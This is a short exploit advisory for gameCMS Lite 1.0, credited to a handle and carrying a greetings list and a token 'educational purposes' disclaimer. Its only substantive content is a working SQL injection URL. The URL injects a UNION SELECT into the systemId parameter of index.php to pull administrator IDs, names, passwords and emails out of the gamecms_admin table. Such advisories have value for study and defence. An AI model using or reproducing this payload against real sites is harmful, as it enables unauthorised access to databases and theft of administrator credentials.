gameCMS Lite Remote SQL Injection Vulnerability by InjEctOr5, discovered by total - djekmani, version 1.
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-Title :: gameCMS Lite Remote SQL Injection Vulnerability
-Author :: InjEctOr5
-discouvred by :: total - djekmani
-HoMe ::
-Application :: gameCMS Lite 1.0
-Download ::
-Dork :: Clear your Mind
-Greets :: Allah - InjEctOr5 TeaM - stack terrorist - coNan - Mr_linker - my love - and all my friends
-Terms of use :: This exploit is just for educational purposes, DO NOT use it for illegal acts.
--------------------------------------------[C o n t e x t]-----------------------------------------
-ExplO!t : http://target/index.php?systemId=5'+union+select+1,2,concat_ws(0x3a3a,adminId,name,password,email,groupId),4,5+from+gamecms_admin/*
-------------------------------------------[End of context]----------------------------------------
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